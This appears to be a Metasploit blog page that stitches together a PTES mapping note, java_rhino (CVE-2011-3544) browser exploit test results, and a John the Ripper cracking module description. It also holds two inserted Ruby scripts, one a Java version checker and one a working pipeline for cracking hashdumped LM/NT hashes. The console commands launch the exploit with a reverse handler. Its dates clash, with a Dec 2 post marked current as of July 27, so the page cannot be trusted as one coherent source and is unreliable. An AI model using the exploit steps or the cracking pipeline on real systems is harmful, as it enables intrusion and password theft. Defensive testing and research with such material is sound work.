
Metasploit and PTES

Posted by jcran Dec 2, 2011

One of our Metasploit contributors, Brandon Perry, has put together a document mapping the recently released Penetration Testing Execution Standard (PTES) to the modules and functionality in the Framework. PTES is a push from a group of testers fed up with the lack of guidance and the disparate sources of basic penetration testing information. Brandon's document does a great job of placing the disparate parts of the framework in the context of the PTES phases.

Hopefully Brandon will continue to build this document out, as it is a handy resource. It helps make the PTES guidance actionable, and is a good read whether you're just getting started or you're an old hand with the framework.

Have a look at the document here.

@_sinn3r and Juan Vasquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one. To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine whether you're running Java, you can use this link and click "Do I have Java?" below the big red 'Free Java Download' button.

We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results. This vulnerability (the Java Rhino script engine bug, CVE-2011-3544, fixed in Java 6 Update 29, i.e. 1.6.0_29) is particularly pernicious: it is cross-platform, still unpatched on some systems, and an easy-to-exploit client-side bug that does little to make the user aware they're being exploited.

Microsoft Windows:

 

Both Windows XP and Windows 7 were tested. A session was created in every browser tested whenever the system was running a Java version prior to the latest (1.6.0_29-b11). Note that Chrome did prompt the user to let them know the Java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browser prompted the user.

WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Ubuntu Linux:

 

Several Linux desktops were tested, one with the Sun Java plugin and another with the IcedTea plugin. The IcedTea plugin was not found to be vulnerable in our testing, though it wasn't tested extensively and may still be vulnerable.

An attempt was made to update the Ubuntu 10.04 device: the Java package was downloaded and linked to the system java. However, the browser plugin was not updated as part of this process, and thus, even though the device was running the latest build (1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395.html - However, even after following these instructions, I was unable to get this process to work, and simply disabled Java on the vulnerable device.

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not; however, when I went to disable the plugin, I noticed that the 'update' button led me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.

Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories

Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories

Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin
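The 10.04 result above (system java updated, browser still loading the old plugin) is worth checking for mechanically rather than trusting `java -version`. The script below is an added example, not code from the original post or from Metasploit: it reports the version of the JRE on PATH and, separately, the version of the JRE that the browser's libnpjp2.so symlink resolves to, and flags either one that is older than 1.6.0_29. The plugin directories it searches and the `<jre>/lib/<arch>/libnpjp2.so` layout are assumptions based on Oracle's manual plugin install page referenced above (Linux only); the `check` argument name is mine.

```ruby
# Added example, not code from the original post or from Metasploit: compares
# the Java version reported by the JRE on PATH with the version of the JRE the
# browser plugin symlink (libnpjp2.so) actually points at. The plugin search
# directories and the <jre>/lib/<arch>/libnpjp2.so layout are assumptions
# taken from Oracle's manual-install instructions; Linux only.

FIXED_VERSION = "1.6.0_29" # first build with the Rhino fix, per the results above

# Assumed plugin locations (user-local Firefox, system Firefox/Mozilla dirs).
PLUGIN_DIRS = [
  File.join(ENV.fetch("HOME", "/nonexistent"), ".mozilla", "plugins"),
  "/usr/lib/mozilla/plugins",
  "/usr/lib/firefox/plugins",
].freeze

# "1.6.0_29-b11" -> [1, 6, 0, 29]: the build suffix is dropped, the update
# number becomes the fourth element, and missing elements are padded with 0 so
# that "1.7.0" compares as [1, 7, 0, 0].
def version_key(version)
  core = version.to_s.split("-", 2).first.to_s
  parts = core.scan(/\d+/).map(&:to_i)
  (parts + [0] * 4)[0, 4]
end

def vulnerable?(version)
  (version_key(version) <=> version_key(FIXED_VERSION)) < 0
end

# Extracts 1.6.0_26 from the first line "java -version" prints.
def parse_java_version(output)
  m = output.to_s.match(/version "([^"]+)"/)
  m && m[1]
end

# <jre>/lib/<arch>/libnpjp2.so -> <jre>
def jre_home_from_plugin(plugin_path)
  jre = plugin_path
  3.times { jre = File.dirname(jre) }
  jre
end

# Resolves the first libnpjp2.so found; nil if no plugin is installed.
def plugin_jre_home
  PLUGIN_DIRS.each do |dir|
    so = File.join(dir, "libnpjp2.so")
    next unless File.exist?(so) # also false for a dangling symlink
    return jre_home_from_plugin(File.realpath(so))
  end
  nil
end

# Runs "<java_bin> -version" (it prints to stderr) and parses the result;
# nil when the binary is missing.
def java_version_of(java_bin)
  out = IO.popen([java_bin, "-version"], err: [:child, :out], &:read)
  parse_java_version(out)
rescue Errno::ENOENT
  nil
end

def report(label, version)
  if version.nil?
    "#{label}: could not determine version"
  elsif vulnerable?(version)
    "#{label}: #{version}  VULNERABLE (older than #{FIXED_VERSION})"
  else
    "#{label}: #{version}  ok"
  end
end

# The check the 10.04 result calls for: both the PATH JRE and the JRE behind
# the plugin symlink must be at or past FIXED_VERSION.
def check_system
  lines = [report("java on PATH", java_version_of("java"))]
  jre = plugin_jre_home
  if jre
    lines << report("browser plugin (#{jre})", java_version_of(File.join(jre, "bin", "java")))
  else
    lines << "no libnpjp2.so found under #{PLUGIN_DIRS.join(', ')}"
  end
  lines
end

puts check_system if ARGV.first == "check" # ruby java_plugin_check.rb check
```

Run it as `ruby java_plugin_check.rb check` on the desktop. If the two lines disagree, the browser is still loading the old JRE regardless of what `java -version` reports, which is exactly the state the 10.04 machine was left in above.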

 

Apple OS X:

 

Interesting issue here: I was forced to update, restart, then update again to get the updated Sun Java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus a second update was required to get the latest Java package. To be fair, this system hadn't been updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.

 

OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Testing for the java_rhino vulnerability:

You can test this exploit in your own environment with the Framework console commands below (set SRVHOST and LHOST first if the web server and handler need to be bound to a specific interface). We are currently prepping our weekly update for our commercial customers; it will be available in the Pro / Express / Community products later today.


msf  exploit(handler) > use exploit/multi/browser/java_rhino

msf  exploit(java_rhino) > info

msf  exploit(java_rhino) > set URIPATH xxxx

msf  exploit(java_rhino) > exploit

 

[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.11:4444

[*] Using URL: hxxp://0.0.0.0:8080/xxxx

[*]  Local IP: hxxp://10.0.0.11:8080/xxxx

[*] Server started.

 

Point vulnerable test systems at the "Local IP" URL (the 0.0.0.0 form is just the bind address), and wait for your sessions.

HDM recently added password cracking functionality to Metasploit by including John the Ripper (JtR) in the Framework. The 'auxiliary/analyze/jtr_crack_fast' module was created to make JtR usable from the Framework and directly from Express/Pro's automated collection routine. The module works against known Windows hashes (NTLM and LANMAN). It uses the hashes stored in the database as input, so make sure you've run hashdump with a database connected to your Framework instance (Pro does this automatically) before running the module. The module collects the hashes from the database, writes them out as a PWDUMP-format file, and passes that file to the john binaries now (as of r13135) included in the Framework.

Several JtR modes are used for quick, targeted cracking. First, wordlist mode: the generated wordlist consists of the standard john wordlist with the known usernames, passwords, and hostnames from the database appended. A ruleset based on the KoreLogic mutation rules is then used to generate mutations of these words. You can find the msf version of these rules here.

Once the initial wordlist run is complete, two incremental (brute-force) modes, aptly named All4 and Digits5, are used to try additional combinations: All4 covers every string of up to four characters drawn from the 95 printable ASCII characters, and Digits5 covers every all-digit string of one to five characters. These sections are shown below and can be found in the john.conf configuration file shipped with the Framework.

Cracked values are appended to the wordlist as they're found. This is beneficial for two reasons:

  1. Previously-cracked hashes are pulled from the john.pot at the start of a run and their passwords are used as seed values for subsequent runs.
  2. The mutation rules are applied to cracked passwords as well, possibly enabling other previously-uncracked hashes to be broken (for example, an LM password recovered in upper case is mutated into the mixed-case candidate that cracks the matching NTLM hash).

Finally, discovered username/password combinations are reported to the database and associated with the host and service.

Cracking modes:

--wordlist=<our generated wordlist> --rules single --format=lm
--incremental=All4 --format=lm
--incremental=Digits5 --format=lm
--wordlist=<our generated wordlist> --rules single --format=ntlm
--incremental=All4 --format=ntlm
--incremental=Digits5 --format=ntlm


Incremental Rulesets:

[Incremental:All4]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 4
CharCount = 95

[Incremental:Digits5]
File = $JOHN/digits.chr
MinLen = 1
MaxLen = 5
CharCount = 10

 

As with everything in the framework, it's subject to patches and improvement, so make sure to check the code. Thanks to mubix for several edits. This info is current as of July 27, 2011.
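To make the pipeline above concrete (PWDUMP file from the database rows, wordlist seeded with usernames, hostnames and earlier cracks, the six john runs in order, and the join back to the host/user rows), here is an added example in Ruby. It is not the jtr_crack_fast module's own code: constructed sample rows stand in for the hashdump entries in the Metasploit database, a constructed john.pot stands in for john's output, and john itself is only executed when the script is run with a `run` argument. The `--pot` option, the `--rules=single` spelling and the `lm`/`nt` format labels are assumed to match a jumbo john build; check them against your own binary.

```ruby
# Added example, not the jtr_crack_fast module's own code: a stand-alone
# reconstruction of the pipeline described in the post. Constructed sample rows
# stand in for the hashdump entries in the Metasploit database, and a
# constructed john.pot shows the feedback loop. "john" is only executed when the
# script is run with a "run" argument; --pot and the "lm"/"nt" format labels are
# assumed to match your john build (jumbo).

require "set"
require "tempfile"

# Constructed database rows. The Administrator hashes are the widely published
# LM/NT hashes of "password"; Guest carries the empty-password hashes.
SAMPLE_CREDS = [
  { host: "10.0.0.5", user: "Administrator", rid: 500,
    lm: "e52cac67419a9a224a3b108f3fa6cb6d", nt: "8846f7eaee8fb117ad06bdd830b7586c" },
  { host: "10.0.0.5", user: "Guest", rid: 501,
    lm: "aad3b435b51404eeaad3b435b51404ee", nt: "31d6cfe0d16ae931b73c59d7e0c089c0" },
].freeze

BASE_WORDS = %w[123456 welcome letmein].freeze # stands in for john's password.lst
HOSTNAMES  = %w[DC01 FILESRV].freeze           # hostnames known to the database

# Constructed john.pot after an LM pass and an NT pass. john cracks each LM
# half separately and records it as $LM$<16 hex>:<upper-case half>; NT entries
# are $NT$<32 hex>:<plaintext>.
SAMPLE_POT = <<~POT
  $LM$e52cac67419a9a22:PASSWOR
  $LM$4a3b108f3fa6cb6d:D
  $NT$8846f7eaee8fb117ad06bdd830b7586c:password
POT

# PWDUMP line, the input format john's lm/nt formats read.
def pwdump_line(c)
  "#{c[:user]}:#{c[:rid]}:#{c[:lm]}:#{c[:nt]}:::"
end

# john.pot -> { "$nt$<hash>" => plaintext, ... } (ciphertext keys downcased)
def parse_pot(text)
  text.each_line.each_with_object({}) do |line, acc|
    cipher, plain = line.chomp.split(":", 2)
    acc[cipher.downcase] = plain.to_s if cipher && !cipher.empty?
  end
end

# Seed words for the wordlist pass: base list + usernames + hostnames + every
# plaintext already in john.pot, so earlier cracks feed later mutations.
def build_wordlist(base_words, creds, hostnames, pot_text)
  words = Set.new(base_words)
  creds.each { |c| words << c[:user] }
  hostnames.each { |h| words << h }
  parse_pot(pot_text).each_value { |plain| words << plain }
  words.to_a.reject(&:empty?)
end

# The six invocations from the post, in order: wordlist+rules, All4, Digits5,
# first against LM, then against NT.
def john_plan(hashfile, wordlist, pot)
  %w[lm nt].flat_map do |fmt|
    [["--wordlist=#{wordlist}", "--rules=single"],
     ["--incremental=All4"],
     ["--incremental=Digits5"]].map do |opts|
      ["john", "--pot=#{pot}", *opts, "--format=#{fmt}", hashfile]
    end
  end
end

# Joins john.pot back to the database rows: an NT hit gives the exact password;
# otherwise the two LM halves are glued together (upper case, possibly partial).
def cracked_creds(creds, pot_text)
  pot = parse_pot(pot_text)
  creds.map do |c|
    if (plain = pot["$nt$#{c[:nt]}"])
      { user: c[:user], host: c[:host], password: plain, source: "nt" }
    elsif pot.key?("$lm$#{c[:lm][0, 16]}")
      halves = [pot["$lm$#{c[:lm][0, 16]}"], pot["$lm$#{c[:lm][16, 16]}"]]
      { user: c[:user], host: c[:host], password: halves.join, source: "lm",
        partial: halves.include?(nil) }
    end
  end.compact
end

# Drives john: the wordlist is regenerated from the current pot before every
# run so that each pass sees what the previous one cracked.
def run_john(creds, base_words, hostnames, pot_path)
  hashes = Tempfile.new("msf_pwdump")
  hashes.write(creds.map { |c| pwdump_line(c) }.join("\n") + "\n")
  hashes.close
  wordlist = Tempfile.new("msf_wordlist")
  john_plan(hashes.path, wordlist.path, pot_path).each do |cmd|
    pot_text = File.exist?(pot_path) ? File.read(pot_path) : ""
    File.write(wordlist.path, build_wordlist(base_words, creds, hostnames, pot_text).join("\n") + "\n")
    puts "[*] #{cmd.join(' ')}"
    system(*cmd) || warn("[-] john exited non-zero")
  end
  cracked_creds(creds, File.exist?(pot_path) ? File.read(pot_path) : "")
ensure
  hashes&.unlink
  wordlist&.unlink
end

if ARGV.first == "run" # ruby jtr_pipeline.rb run /tmp/msf.pot
  run_john(SAMPLE_CREDS, BASE_WORDS, HOSTNAMES, ARGV[1] || "msf_john.pot").each do |r|
    puts "[+] #{r[:host]} #{r[:user]}:#{r[:password]} (#{r[:source]})"
  end
end
```

The ordering matters: LM is cracked first because its halves are cheap, and the upper-case halves then land in the wordlist for the NT pass, where the single rules toggle case and recover the real password. The `partial` flag marks rows where only one LM half has fallen so far.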

 

UPDATE: Check out KoreLogic's upcoming Defcon 19 password cracking contest if you're interested in this stuff!
